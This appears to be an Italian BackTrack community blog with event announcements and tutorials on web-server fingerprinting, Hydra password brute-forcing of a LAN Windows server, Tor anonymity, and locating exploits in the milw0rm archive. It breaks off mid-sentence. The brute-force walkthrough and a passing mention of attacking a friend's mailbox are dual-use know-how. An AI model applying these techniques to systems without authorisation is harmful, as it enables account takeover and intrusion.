***

Riprendo come dal forum , il post di emgent…  …che nessuno pensi di poter mancare

Segnatevi in agenda l’appuntamento:   Orvieto sabato 11 luglio 2009.

CAT 2009 – Cracca Al Tesoro è l’«hack contest» che per la prima volta in Italia viene portato all’interno di un contesto cittadino: Orvieto.

Perché Orvieto?

E’ una città che si può girare a piedi facilmente (misura 1,5 km di lunghezza per 700 m di larghezza), i residenti sono affabili, cordiali, disarmanti nella loro semplicità e la città è una fortezza naturale rimasta inviolata per alcuni secoli in un passato remoto.

Cracca Al Tesoro non sarà solo un contest ma una giornata unica con un mix inusuale: tecnologia, sicurezza, hacking si mescoleranno alle tradizioni, alla cultura e alla storia di una delle più belle città dell’Umbria.

Nerds, geeks ed esperti scorrazzeranno per la città armati di notebook e antenne direzionali seguiti dagli sguardi curiosi e dalle escamazioni dei residenti, dei negozianti e dei numerosi turisti provenienti da tutto il mondo.

In concreto di cosa si tratta?

E’ un “Hacking Game”.

Un incrocio fra un “Capture the Flag”, una caccia al tesoro ed il wardriving, nel più puro spirito hacker.

All’interno del centro storico di Orvieto verranno posizionati una serie di access point wireless.

I partecipanti, a squadre, dovranno a partire da un indizio iniziale, individuare il primo access point, violarlo, “bucare” l’eventuale sistema collegato per trovare l’indizio che porta al successivo access point, fino al bersaglio finale.

La vittoria si raggiunge, quindi, superando una serie di ostacoli posizionati in luoghi differenti, che dovranno essere individuate dai partecipanti come parte del gioco.

Il gioco sarà la parte “visibile” della conferenza nazionale degli sviluppatori di backtrack, una distribuzione Linux gratuita per chi si occupa di Sicurezza Informatica.

Hack contest, capture the flag, wardriving (nelle sue varianti) sono modelli oltremodo diffusi. In ogni “convention hacker” che si rispetti c’e’ un “CTF” (Capture the Flag) contest: noi abbiamo voluto proporre un format diverso, unico ed innovativo.

Venite ad Orvieto, vi aspettiamo!!!!

Le pre-iscrizioni saranno aperte da sabato 20 giugno e si chiuderanno domenica 5 luglio.

maggiori informazioni su: www (punto) wardriving (punto) it

Ciao a tutti,

sono quì a presentarvi il nuovo meet-irc che riguarda la nostra community…

Come da mailinglist vi riporto il testo , invitandovi ad iscrivervi indicando il vostro nickname nel form.

ciao a tutti.  

****************************************

Come da titolo, si farà il giorno:

Mercoledì 10.06.2009
alle   ore 22:00

il nuovo meet-irc della nostra comunità.

È importante essere presenti , discuteremo delle nuove prospettive e
materie riguardanti:

- 1 -
il nuovo forum   ed   il nuovo wiki

- gli editori, come partecipare , lineeguida da assumere e
regolamento del forum da rispettare -.

- 2 -
il contest & conference

-Il contest del 11.07.2009 ad Orvieto (TR) , che precluderà una
presentazione al pubblico del progetto internazionale di BackTrack -
remote-exploit.org e del progetto riguardante la comunità italiana e
le sue future prospettive.
Verrà ovviamente relazionata tutta la giornata sul contest e le sue
specifiche.-

- 3 -

varie ed eventuali

-Eventuali richieste e chiarimenti da parte di tutti i membri della
comunità.-

***

A scopo esclusivamente di adesione, è necessario compilare il seguente
form con il solo nickname:

***

****************************

nickname:   __________

****************************

grazie a tutti.

«Back|Track-[IT]

****************************************

come sempre:

on    irc.freenode.net     /join   #backtrack.it

Per i non iscritti alla nuova mailinglist potete visitare il gruppo tramite il link alla destra del blog

***

Ciao a tutti,

eccomi quì a presentarvi la data del primo meet della nostra community.

la riunione si terrà Martedì 19.05.2009 alle ore 22.

Si inizieranno a delineare le prime vie che formeranno le basi della nostra comunità.

irc.freenode     /join #backtrack.it

Esserci è un dovere.

Ricordo che se avete degli argomenti da proporre o delle particolari richieste scrivete nella mailinglist

backtrack-italia (-@-) googlegroups.com

***
www.backtrack.it

***

Ciao a tutti,

quello che sto per farvi è un annuncio per il quale già da tempo stavamo lavorando.

Come avete potuto notare da molto non scriviamo più sul blog , questo , chi ci ha sempre seguito ne è già al corrente , è dovuto al fatto che stavamo già lavorando ad un progetto che racchiudesse dei portali da raccogliere sotto il dominio backtrack-it.net , creando così una community italiana a riguardo della distro che tanto ci ha appassionato e che tutt’ oggi ci appassiona.

La BackTrack già dai primi tempi si è mostrata subito come il top tra le security-distro , la crescita che ha avuto , sia come utenza che come sviluppo , è stata esponenziale ,  a tal punto da far sì che ai vari livelli nazionali , proprio come nel nostro caso , si andassero già designando dei gruppi di utenti intenzionati a creare comunità nella propria lingua , basta guardare l’ esempio , da me sempre ripreso , degli amici di backtrack-fr.

Durante il nostro cammino per la creazione della comunità italiana sulla distro , un’altra realtà , portata avanti da Emanuele Gentili (developper di BackTrack) , stava nascendo.

Chi ci ha seguito e ci conosce ,  sà benissimo che non è mai stato nostro interesse fare utenza o portare avanti un “nostro” progetto personale , il nostro interesse è stato ed è solo la creazione di una comunità di appassionati totalmente italiana dedicata alla BackTrack.

Abbiamo quindi deciso di unire le nostre anime e portare avanti così un progetto comune , quello della comunità italiana ufficiale sulla BackTrack.

Non rinnoverò quindi il dominio www.backtrack-it.net , per quanto riguarda la costituzione del forum e del wiki vi farò sapere al più presto aggiornando quest’ articolo.

ATTENZIONE:

L’ attuale mailinglist verrà mantenuta fino a quando tutti i membri non saranno passati alla nuova , ma tutti gli argomenti saranno automaticamente fatti spostare sulla nuova.

Il canale irc presente su Azzurra.org verrà mantenuto per direzionare gli utenti nel nuovo canale su Freenode.

Ecco quindi i nuovi indirizzi a cui fare riferimento:

questa la pagina del portale :

www.backtrack.it

questa la pagina della mailinglist su googlegroups , alla quale vi invito subito ad iscrivervi per organizzarci e sapere al più presto tutte le novità :

backtrack-italia

Il nuovo canale Irc è      #backtrack.it su Freenode

per qualsiasi dubbio o altro  scrivete nella mailinglist, accedete pure dal banner a destra del blog

oppure  brigante(-@-)backtrack.it

Alla prossima.

***

Ciao a tutti,

eccoci di nuovo tornati a parlare di Finferprinting e questa volta lo faremo a riguardo di un tool molto particolare …l’ HTTPrint.

Httprint è un tool per l’information-gathering di web servers sviluppato dal team Net-Square.

In BackTrack-3.Final è preinstallata la versione 301, in modalità GUI e da linea di comando (le due ovviamente svolgono le stesse funzioni).

Httprint utilizza le caratteristiche dei web servers per identificarli, e tenta di farlo nonostante offuscamenti vari o mediante l’utilizzo di plugins come mod_security o servermask (che servono appunto a mascherare il  web-server in questione).

Il tool, per adempiere a ciò, utilizza delle stringhe di testo che vengono confrontate con le stringhe di risposta ottenute in rete, da ciò scaturisce il risultato; è inoltre molto semplice aggiungere altre stringhe al database predefinito di Httprint modificando il file di testo apposito o utlizzando un database più aggiornato.

***

Per utilizzare il tool in modalità CLI dobbiamo selezionare dal menu Backtrack>Network Mapping>Service Fingerprinting>Httprint
oppure da shell:

______________________________________________________

#cd /pentest/enumeration/www/httprint_301/linux
# httprint

______________________________________________________

Per utilizzare invece la modalità GUI del tool dobbiamo selezionarlo dal percorso:

______________________________________________________

Backtrack –>Network Mapping –> Service Fingerprinting –> Httprint_GUI,

______________________________________________________

Per comodità useremo per il nostro test l’ interfaccia grafica.
La prima cosa che si consiglia di fare prima di utilizzare il tool è di aggiornare il database delle signatures sovrascrivendolo con quello più recente.

Il database lo troviamo nella directory:

/pentest/enumeration/www/httprint_301/linux/

il nome è “signatures.txt”
Scarichiamo il file aggiornato da questo indirizzo: http://www.net-square.com/httprint/signatures.txt
e sovrascriviamolo a quello più datato.
Ora dobbiamo creare il nostro file di input nel quale specificheremo gli obbiettivi che il tool dovrà analizzare.

Il file di input , (input.txt) , si trova nella stessa destinazione di signatures.txt dunque:

/pentest/enumeration/www/httprint_301/linux

Apriamo il file input.txt con l’editor e dovrebbe apparire qualcosa del genere:

***

# inputs for httprint can be:
# – individual IP addresses (default port 80)
# – http://servername:[port]/
# – https://servername:[port]/
# – IP ranges xx.xx.xx.xx-yy.yy.yy.yy
#
http://www.apache.org/

***

Come possiamo vedere da questo file HTTPrint accetta diversi tipi di input i quali, qualora fossero più di uno, potrebbero essere anche analizzati contemporaneamente dato che ha la possibilità di lavorare su più bersagli in modo parallelo.

Noi faremo delle prove su un solo bersaglio.

L’host da voi designato dunque dovrà essere sovrascritto al posto di www.apache.org, noi useremo google.com e apache.org.
Non ci resta che aprire Httprint_GUI. Fatto ciò possiamo notare che Httprint non accetta come input solo files .txt ma anche files di tipo .xml creati dal famoso tool nmap, [(1) - (2)] , è infatti selezionabile questa opzione nella finestra principale; in seguito proveremo anche questa possibilità.
Diamo uno sguardo ora alla parte centrale della GUI dove possiamo osservare le seguenti voci:
Host ; Port ; Banner-Reported ; Banner-Deduced ; Confidence
La prima voce è Host: questa ci darà naturalmente google.com o apache.org, in seguito abbiamo la porta (se non la impostiamo nel nostro file di input manualmente quella di default rimarrà la 80), l’ultima voce sarà il tasso di affidabilità (confidence rating), in questo momento ci indicherà 0 -zero- , perchè ancora non abbiamo iniziato la scansione.
Per iniziare dobbiamo schiacciare il tasto verde nella parte bassa della GUI, ciò farà partire il processo di raccolta informazioni.
Nota: Se hai selezionato bersagli multipli dovrai aspettare un bel pò , ma se vuoi interrompere il processo puoi sempre utilizzare il tasto stop.
Una volta completato dovremmo vedere utilizzati i campi che prima erano vuoti e una finestra popup ci dovrebbe anche informare che il processo è terminato.

Ora dovremmo avere informazioni molto importanti sul nostro bersaglio. Dovremmo avere informazioni sul banner ricevuto , e sul webserver che Httprint ritiene sia il più probabile infine anche qualche info relative all’SSL (se utilizzato).

***

Iniziamo:
Settiamo l’ input file:      z:\pentest\enumeration\www\httprint_301\linux\input.txt
signature file:              z:\pentest\enumeration\www\httprint_301\linux\signatures.txt
e ora il percorso in cui vogliamo salvare il nostro file di report:
z:\root\Desktop\httprintoutput.html
io lo salvo sul desktop.

***

***

Diamo l’avvio col tasto verde
Ecco i risultati:
Banner reported: Apache/2.2.9(Unix)
Banner deduced:  Apache/2.0.x
con una confidence rating del del 78,31%, quindi abbastanza alta.
Dunque le informazioni ricevute direttamente dal server web ci dicono che esso è un Apache 2.2.9 mentre il nostro Httprint  in base al confronto fra le stringhe di testo ricevute e quelle presenti nel suo database ci dice che il server è un  Apache 2.0.x. Risultato soddisfacente considerando l’alto tasso di confidence rating, l’unica divergenza è la versione che oscilla tra la 2.0 e la 2.2, cosa del tutto naturale considerando che quando si fa un fingerprinting è quasi impossibile avere la certezza matematica di ciò con cui si ha a che fare.
Questo è il report file:

***

***

Ora facciamo una prova utilizzando un file di output di nmap:
Il comando di input che darò a nmap sarà il seguente:

#nmap www.google.com -p 80 -oX /root/aaa.xml

L’ host che utilizzeremo sarà: www.google.com , la porta sarà la 80, il file creato si chiamerà aaa.xml e la sua destinazione sarà nella cartella root/

***

***

Apriamo a questo punto Httprint_GUI e selezioniamo “nmap“ nella parte dedicata all’input file, premiamo il tasto sfoglia e selezioniamo il file aaa.xml , infine col tasto “load” lo carichiamo.

L’unica cosa da fare a questo punto sarà premere il tasto verde di avvio.
Una volta terminato possiamo constatare che , mettendo in correlazione la stringa catturata e quelle del nostro database, Httprint ipotizza che il web-server da noi analizzato possa essere un WebSitePro/2.3.18 , con un tasso di affidabilità del 39,76% , dunque non molto affidabile.

Solo al secondo posto troviamo come risultato gws , (google web server) , cioè l’informazione che abbiamo ottenuto direttamente dal server che stavamo analizzando (come si può vedere dalla foto in basso).

In questo caso credo che il secondo sia il risultato più accreditabile dato che tutti sanno che google.com utilizza web-server del tipo gws (web-server particolari per far fronte all’enorme traffico di cui è oggetto).

***

***

Possiamo aprire a questo punto il “Report File” che dovrebbe fornirci qualche info in più.
Alla prossima.

***

Ciao a tutti,

quello che segue non è un vero e proprio tutorial , ma solo un’ altro esempio d’ utilizzo del tool per il login-bruteforcing Hydra.

Hydra , eccellente prodotto della THC-Freeworld , di cui abbiamo già parlato , offre la possibilità di fare bruteforcing su molti tipi di protocolli , quello di seguito è un semplice esempio fatto contro un WindowsServer-2003.spk2 , (nella mia Lan) , tramite il protocollo Telnet.

Il tutorial precedente che trattava di Hydra è stato scritto mentre facevo delle prove sulla casella mail di un mio amico , quindi su protocollo pop3 , utilizzando Hydra-gtk , l’ attuale XHydra contenuto in BackTrack in…

BackTrack –> PrivilegeEscalation –> PasswordAttack –> PasswordOnLineAttack –> “…”

Appena aperto hydra-gtk si presenta con una GUI molto intuitiva , anche per i più ostici non è difficile comprenderne il funzionamento…

***

(Naturalmente la foto rappresenta solo un esempio dell’ interfaccia…)

***

Visto che di hydra abbiamo già parlato in passato , veniamo subito al nostro test , che faccio esclusivamente per poter mettere un video anche a riguardo di Hydra , inserito naturalmente nell’ apposita pagina del blog.

Seguendo il video…

lanciando uno scanning con nmap contro il mio server , con opzioni di service fingerprinting , vediamo subito che la porta 23 del server , all’ indirizzo 29.230.6.73 è aperta ed utilizzata per il servizio Telnet , solito sulla porta 23.

ecco infatti il risultato della scansione…

_______________________________________________

HaCkLaB ~ # nmap -sV -T Aggressive 29.230.6.73

Starting Nmap 4.68 ( http://nmap.org ) at 2008-09-10 13:44 GMT
Interesting ports on 29.230.6.73:
Not shown: 1710 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Microsoft Windows XP telnetd
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1027/tcp open IIS?
MAC Address: 00:02:72:61:7B:52 (CC&C Technologies)
Service Info: OSs: Windows XP, Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.891 seconds

_______________________________________________

Ora per iniziare l’ attacco basta crearci un file di testo che poi andremo ad utilizzare come wordlist per le nostre eventuali password… …il file , con estensione *.txt , lo metteremo per comodità nel nostro Desktop , nel mio caso con il nome pwd.txt.

Per avere una wordlist decente ci sono molti mezzi , in passato abbiamo scritto riguardo a wyd e alla raccolta di specifiche wordlist anche attraverso pagine HTML , ma volendo in BackTrack una wordlist compressa è già presente , in /pentest/password/…. dal nome wordlist.txt.tar.gz , quindi basta andare a prenderla e modificarla con in testa al file le nostre eventuali password…

quidni:

_______________________________________________

HaCkLaB ~ # cd /

HaCkLaB / ~ # cd pentest/password/

HaCkLaB pentest/password/ ~ # tar xvfz wordlist.txt.tar.gz

wordlist.txt

HaCkLaB pentest/password/ ~ # SciTE wordlist.txt

_______________________________________________

In questo modo potremo modificare la nostra wordlist con le stringhe che noi vogliamo tramite l’ editor SciTE , anche se ovviamente potete farlo con l’ editor che voi preferite.

Io per comodità , (visto che è solo un esempio pratico…) , ho messo la password komintern alla testa della lista , in questo modo sarà la prima ad essere provata e naturalmente a riuscire.

Bene , vista la scansione possiamo passare i risultati della stessa a XHydra , in questo modo possiamo lanciare l’ attacco…

Come potete vedere dal video , appena compilati tutti i campi necessari Hydra inizia a fare i tentativi di login , secondo le impostazioni che noi abbiamo inserito , nel caso del video , ho inserito 3 task con un timeout di 59 secondi.

il risultato arriva presto…

*** user: Administrator *** password: komintern ***

Alla prossima…

***

Ciao a tutti,

eccoci tornati a scrivere di un argomento che in molti mi hanno chiesto di provare , sto parlando dell’ uso in BackTrack di software per l’ anonimato in rete come TOR.

Tor è un progetto creato per rendersi anonimi durante lo scambio di informazioni in rete , dal chattare all’ Istantaning Messaging fino alla semplice navigazione , usando appunto un circuito “indefinito” che porta lo stesso nome del software , Tor.

la nascita di Tor è avvenuta come reazione all’ analisi del traffico che alcuni enti , seppur a volte con scopi comprensibili , eseguono venendo in possesso di informazioni riguardanti l’ utenza in generale , informazioni che sono pursempre private e che ognuno dovrebbe poter scegliere se rivelare o meno.

***

***

Per potersi anonimizzare durante la propria connessione in rete ci sono vari metodi come ad esempio , che sembra essere ancora il più usato , l’ uso di proxy , più o meno fidati.

Un proxy viene da noi ritenuto fidato quando nasconde il nostro indirizzo IP , mettendoci quindi in condizioni di rimanere anonimi durante la navigazione o la connessione in generale , ma se in un modo o nell’ altro si volesse risalire al nostro indirizzo IP ci basta far riferimento ai log I/O del proxy e si potrebbe risalire facilmente al momento e al nostro indirizzo di rete , per questo ci sono proxy fidati e meno , ma per evitare di correre rischi del genere la scelta del progetto Tor è quella che fà per noi.

La rete Tor è composta da normale utenza e nodi , nodi che sono costituiti da una parte dell’ utenza stessa del progetto e che si scambiano informazioni , cryptate e non , che fanno in modo che le connessioni da cui sono attraversati non abbiano una direzione specifica e che addirittura ripercorrano per più di una volta lo stesso nodo , in questo modo la rilevazione della connessione da parte di una specifica utenza risulta troppo difficile e l’ anonimato è altamente affidabile.

Ora , pensiamo solo per un momento: riuscire a risalire , anche in condizioni avvantaggiate di cui ad esempio alcuni enti possono godere , ad uno specifico indirizzo IP dal log di un proxy è possibile , in modo proporzionale all’ affdabilità del proxy stesso ma pursempre possibile , per chi usa Tor però la cosa è totalmente diversa perché troppe sarebbero le informazioni di cui si dovrebbe venire in possesso e comunque sono informazioni che riguardano molti utenti e soprattutto privati… …in pratica si dovrebbe invadere la privacy di troppi utenti e con un risultato tutt’ altro che prevedibile.

Tor risulta quindi , (almeno per chi scrive) , la migliore strada per l’ anonimato e costituirsi come nodo , partecipando quindi ad un progetto come Tor è una cosa che con il passare del tempo diventerà semprepiù necessaria.

Per maggiori informazioni vi rimando nturalmente al sito ufficiale del progetto , che contiene informazioni “da leggere accuratamente” prima di utilizzare Tor , ora veniamo allo scopo del tutorial , ovvero: rendersi anonimi con Tor in BackTrack.

BackTrack di prima installazione ci offre due web browser , Konqueror e Firefox , entrambe possono essere gestiti usando Tor , installando e configurando TORK , il progetto Tor impostato , facilitato ed arricchito per il Desktop Manager KDE.

La scelta dell’ uso di Tork non è arrivata per la mancanza di risultati derivanti dall’ uso di Tor senza l’ ausilio di Tork , ma solo per fare in modo che in BackTrack , nel modo più veloce , comodo ed efficace , si riesca a rendersi anonimi per il numero più ampio di servizi possibile , essendo oltretutto una distro nata per l’uso in live con Tork ho notato una facilitazione di tutto il procedimento.

Tork infatti , alla fine di tutte le procedure e configurazioni , (tutte molto semplificate tramite GUI) , riuscirà a farci ottenere l’ anonimato per Konqueror , Firefox , Kopete , Pidgin , Konversation coprendo così la maggiorparte dei servizi possibili in rete da un pc-desktop , il tutto con un click sul launcher , per maggiore comodità e scelta anche di eventuali nostri proxy , installeremo Privoxy , che naturalmente dovremmo impostare per lavorare con Tor , (prima immagine dei due screenshot sotto) , in BackTrack basta inserire al primo avvio di Tork la path dell’ installazione di Privoxy , di solito:

/usr/local/sbin/privoxy

Volendo ci si potrebbe avvalere anche di altri proxy , disabilitando Privoxy oppure senza installarlo , (secondo screenshot) , anche se lo consiglio con e senza Tor.

Privoxy è un gestore / proxy con la capacità di filtrare spam , controllare cookie e accesso in pagine web , rimuove pop-up e pubblicità…   …e lavora perfettamente con Tor.

***

***

Tork ci offre la possibilità di renderci anonimi anche durante sessioni da shell , come ad esempio connessioni a server tramite protocolli Telnet e SSH , cosa che rende ancor più importante ed indispensabile avere Tork installato sul proprio sistema.

Veniamo ora alla procedura…

Innanzitutto dobbiamo installarci Tor e Privoxy , essendo già disponibili , (e da me testati in BackTrack-3.final ma non in BackTrack-3.beta) , i pacchetti della Slackware-12.0 , ci basterà installare le versioni presenti nei repository , quindi con slapt-get:

slapt-get –search privoxy

slapt-get –install privoxy-*-*.tgz

slapt-get –search tor

slapt-get –install tor-*-*.tgz

Non inserisco il numero delle versioni perché potrebbero variare secondo i repository…

A me l’ installazione con slapt-get non ha rilevato la mancanza di nessuna dipendenza , naturalmente nel caso in cui serva si risolve.

Una volta installati Tor e Privoxy consiglio un reboot , per poi procedere con l’ installazione sempre con slapt-get di Tork:

slapt-get –search tork

slapt-get –install tork-*-*.tgz

***

***

Una volta installatio Tork sarà presente nella sezione Internet con un launcher , che io ho messo per comodità nel pannello di KDE in modo da poter scegliere il servizio da avviare , anche singolarmente.

questa , solo per testimonianza , è uno snapshot fatto prima di attivare Tork , con FoxyProxy:Disabled e l’ icona di Tork verde , INATTIVO…

***

***

L’ IP è contraffatto , ma per il nostro scopo è più che sufficiente.

Appena installato Tork , all’ apertura , presenta un’ interfaccia grafica , con il simbolo “play” sul logo , appena premuto il play , ci verranno chieste le configurazioni , che ognuno può fare com meglio crede.

Io , visto che l’ ho sempre usato del resto e mi ci sono sempre trovato benissimo , consiglio di installarsi i comodi Add-ons per Firefox , Tor-Button e FoxyProxy , in questo modo li avrete sempre sotto controllo e potrete attivarli/disattivarli all’ occorrenza… …quì FoxyProxy , ( impostato naturalmente all’avvio di Firefox per lavorare con Tor… ) ,e Tor-Button.

iniziamo la nostra connessione aprendo Firefox tramite il launcher di Tork…

***

***

…questa l’ immagine de il mio IP con l’ uso di Tor…

***

***

Potete notare che ho attivato sia FoxyProxy per lavorare con Tor e l’ icona di Tork è Rossa , quindi Tork è ATTIVO.

Come potete vedere l’ utilizzo di Tork ha cambiato inaspettatamente il mio tema di Firefox , ma a parte questo lieve cambiamento non ho notato alcun problema , anzi a dire il vero mi aspettavo una connessione in stile 56K , invece , anche se con una normalissima riduzione di velocità , ho raggiunto i miei soliti siti web con una velocità di tutto rispetto e con la copertura totale della mia privacy.

È da dire con estrema sensibilità che Tor va usato con la massima attenzione , nel senso che Tor anonimizza il nostro traffico , ma non può anonimizzare ad esempio le informazioni che possono attraversare plugin come i classici Java , Flash , i controlli ActiveX , il plugin Realplayer e via dicendo… …è consiglitato per questi fattori avere 2 browser aperti nello stesso momento , avere quindi un browser per la connessione sicura con Tor abilitato e uno per le normali connessioni , oppure se si vuole usare sempre e comunque Tor bisognerebbe disabilitare i plugin che ci mettono in condizioni di rischio.

Per queste ed altre indicazioni è consigliato leggere molto attentamente la pagina degli WARNING’S del progetto Tor.

Non è la prima volta che uso Tor , ma la prima volta che uso Tork sì e devo dire che l’ ho trovato como e veloce per questo secondo me adattabile facilmente ad una live come BackTrack , basti pensare che essendo appunto una distro live , sono pochi coloro che vogliono avvalersi di programmi per la gestione di posta elettronica come ad esempio mozilla-thunderbird o kmail , con Tork possono inviare mail anonime con estrema facilità , questa la semplice interfaccia grafica…

***

***

Una volta abituati , bene , all’ uso di Tor , si può benissimo prendere in considerazione l’ idea di rendersi perennemente nodo del progetto , per la crescita della privacy e delle libertà collettive , oggi semprepiù a rischio.

Alla prossima.

***

Ciao a tutti,

eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più interessanti.

Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra BackTrack per fare un pentesting tramite l’ uso dell’ archivio degli exploits di milw0rm.com.

Per eseguire il nostro pentesting ci serviremo di:

• L’ Archivio degli Exploits di Milw0rm.
• nMap , per la scansione con opzioni per il fingerprinting.
  
• Dsniff , esclusivamente per lo sniffing delle credenziali da localhost.

***

Ci tengo a dire che in questo tutorial non è stato fatto danno ad alcuno , tutti si svolge nella mia LAN . Ho provato a chiedere l’ autorizzazione a vari sysadmin , ma dopo aver upgradado le loro cosette non mi hanno nemmeno risposto… ….0 su 9.

Altra cosa importrante che mi sento di aggiungere è di ringraziare: KaB0T per la disponibilità ed  EikaF , senza il quale avremmo fatto un altro video lento ed incasinato , anche se da questo punto di vista dobbiamo ancora migliorare credo che si veda la differenza “in meglio” nei confronti dei video precedenti.

***

tutto il tutorial è referente interamente al video che abbiamo fatto , dal nome

“BackTrack & Milw0rm Exploits Archive” , naturalmente presente nella pagina /video.

è stato girato interamente con Fluxbox , ma le sezioni che io uso per Fluxbox sono identiche a quelle impostate di default in BackTrack per KDE , quindi non cambia nulla…

…Il video è scaricabile da Quì.

***

Innanzitutto voglio fare delle piccole precisazioni:

Il pc nella mia LAN ha un multiboot con: WinServer-2003.spk2-(FamilyConnection-CMS)- , WinServer-2000.spk3-(-XAMPP)- , Windows Xp spk2-(BadBlue-WebServerFileSharing)-.

Sono stati usati in tutto 3 exploits , per altrettante demo nel video.

Uno degli exploits è un exploit scritto da rGod e diretto verso uno Xampp… , (-nel video ultima demo-) , …cos’é uno Xampp?

lo Xampp è un “aggregato” di webserver e database , con tanto di interprete PHP , in pratica con lo xampp ho instalato sul sistema , poi preso come “vittima” , il webserver Apache , il database MySql e l’interprete PHP , per saperne di più potete darvi una leggerissima letta alla nostra pagina /Inf0-[IT]

Un altro exploit , (-nel video seconda demo-) , (scritto dal CWH Underground Hacking Team) , invece è diretto contro un CMS , il FamilyConnection CMS , una piattaforma tipo WordPress , solo che viene usata molto fra community.

L’ altro exploit , (-nel video prima demo-) , (scritto da J.Cervini su un Bug scoperto da L.Auriemma) , è diretto invece verso un webserver , il BadBlue. Il BadBlue è un semplice webserver utilizzato per il filesharing tra conoscenti , installandosi sul proprio sistema il BadBlue si possono in pratica condividere files di tutti i tipi.

tutti questi exploits utilizzati sono naturalmente corrispondenti ad una specifica versione dei corrispettivi server , CMS , applicazioni eccetera…

***

Ma facciamo una breve descrizione di cio che stiamo per fare…

Il team di remote-exploit.org , ha pensato bene di inserie un tool da riga di comando che permetta a tutti gli user di BackTrack di avere a disposizione , (anche OFF-Line) , un archivio di exploits per effettuare , in ogni situazione , un pentesting con il massimo grado di efficacia e lo ha fatto inserendo in BackTrack l’ archivio exploits di Milw0rm.

Milw0rm è un sito che raccoglie centinaia di Exploit & Shellcodes , scritti in vari tipi di linguaggi di programmazione e per tutti i tipi di piattaforme ed applicazioni , web e non.

[installazione Archivio per la BackTrack3.final]

Fino alla versione 3.beta della BackTrack un archivio degli exploits di milw0rm era inserito da installazione , dalla 3.final no , ma basta installarselo tramite Fast-Track , (tool multifunzione di cui scriveremo a breve…), quindi:

KdeStartMenù –> BackTrack –> Penetration –> Fast-Track ,

dal menù principale di Fast-Track scegliete la modalità “interactive“:

bt~# ./fast-track.py -i

In questo modo otterrete un altro menù , scegliete l’ opzione 1 , quindi la 4 e vi si installerà l’ archivio milw0rm. con lo script per l’ UPdate.

***

Fast-Track Updates

Enter a number to update

1. Update Fast-Track
2. Metasploit 3 Update
3. Aircrack-NG Update
4. Milw0rm Update
5. Nikto Plugin Update
6. W3AF Update
7. SQLMap Update
8. Installation Menu
9. Update Everything
10. Return to Main Menu

Enter number:

***

Oltre a Milw0rm ci sono molti altri siti che raccolgono , ed hanno un proprio archivio di exploits e di shellcodes , ma visto che tratteremo l’ uso di un archivio già presente in BackTrack , ( o almeno installabile – per la 3.final ) , descriveremo ed effettueremo un pentesting con l’ archivio di Milw0rm.

È possibile trovare sul sito Milw0rm materiale quali:  documenti , videotutorial , withepaper , il password cracker , un dizionario , ed è possibile inoltre ottenere tramite download lo stesso archivio degli exploits.

Una piccola , ma molto comoda , utility che Milw0rm offre è l’ estensione per Firefox che abilita la ricerca sullo stesso sito , volendo l’ opzione è disponibile quì.

Milw0rm è un sito che , insieme ad altri quali , solo per fare un esempio , SecurityReason – Security Focus , Packet Storm , Vulnerability Assestament , Securiteam …eccetera , ottiene nuovi exploits in maniera abbastanza “lesta” , tutti gli amministratori di sistemi traggono importanti informazioni da milw0rm , personalmente non credo che chiunque voglia essere al passo con la scoperta di nuove vulnerabilità possa fare a meno di passare per un sito come Milw0rm.

Non posso però evitare di dire che non tutte le vulnerabilità vengono rilevate ; che non tutte quelle rilevate vengono rivelate e che non si può essere MAI certi al 100% di conoscere tutte le vulnerabilità , è una cosa impossibile , ma tenersi aggiornati periodicamente è una cosa fondamentale , farlo tramite un sito di exploit pubblici come quelli che vi ho appena elencato è sicuramente un ottimo inizio.

Gli exploit che non sono ancora stati rivelati , che prendono il nome di 0day , sono quelli che possono causare più problemi di tutti , visto che la loro effettiva funzione viene scoperta a danno già fatto.

Va detto comunque che ci sono anche 0day che vengono rivelati direttamente dai siti che vi ho citato sopra , ma questa è una cosa che dipende da coloro che li rendono pubblici.

Fatte queste dovute premesse credo sia giusto scrivere qualcosa anche a riguardo degli exploits , almeno per rendere l’ idea a tutti di quello che stiamo facendo.

Un exploit è un programma , script , che permette di sfruttare delle vulnerabilità insite in applicazioni , programmi di varia natura e funzione , database o anche una semplice pagina web e che ci permette di poter eseguire sul sistema preso come obbiettivo dell’ attacco , del codice “maligno” , dannoso , cosa che normalmente non è possibile fare. L’ exploit , inteso come programma , o script , può rappresentare anche una stringa unica , come ad esempio nel caso dell’ Sql-Injection , basta andare su Milw0rm per rendersene conto.

Un exploit può essere scritto in vari tipi di linguaggii di programmazione , dal C al python , dal Php al Perl e così via… …e molte volte necessitano di compilazione.

Di seguito elencherò alcuni tipi di attacco , ma lo farò seguendo il metodo che ci interessa in questo tutorial , quindi secondo la suddivisione dell’ archivio degli exploits di milw0rm in rete , sullo stesso sito milw0rm , oppure secondo l’ archivio in BackTrack.

[UPdate Milw0rm Archive]

Facciamo , come bisognerebbe fare ogni qualvolta si intende eseguire un test di penetrazione tramite degli exploits , un UPdate dell’ archivio degli Exploits di Milw0rm , andiamo quindi in:

KdeStart –> BackTrack --> Penetration --> Milw0rmExploitArchive-> “…” , e da quì selezioniamo: “Update Milw0rm Archive” , in questo modo ci si aprirà una shell che automaticamente effettuerà l’ UPdate , otteniamo così tutto l’ archivio aggiornato degli exploits da milw0rm.com.

[Ricerca exploits]

Gli exploits che abbiamo ottenuto tramite il nostro UPdate si trovano nella seguente directory:

/pentest/exploits/milw0rm/ “………”

Ora , appena terminata la procedura di UPdate , andiamo nella directory indicata sopra direttamente da Konsole , con xTerm oppure con Konqueror , da quì possiamo vedere che nella directory ~/Milw0rm/ sono contenute altre subdirectory , ognuna identifica una serie di exploits equivalenti a determinati tipi di piattaforme …platforms , o porte …rport.

Dalle subdirectory in ~/platforms/… windows , unix , solaris …eccetera si dividono poi in attacchi da remote o local.

***

Grazie ad una novità di ./str0ke , (admin di milw0rm.com) , che ha creato una lista di exploits appositamente per BackTrack , (dal nome appunto “sploitlist-bt.txt” ) , il metodo di ricerca per gli exploits che si trovano all’ interno dell’ archivio Milw0rm in BackTrack , si esegue tramite il comando grep , sempre da shell e naturalmente all’ interno della directory che contiene le liste di exploits in formato *.txt , una dal nome sploitlist.txt e l’ altro sploitlist-bt.txt

In questo modo , se ci serve ad esempio un exploit per il Vista , ci basterà dare il comando:

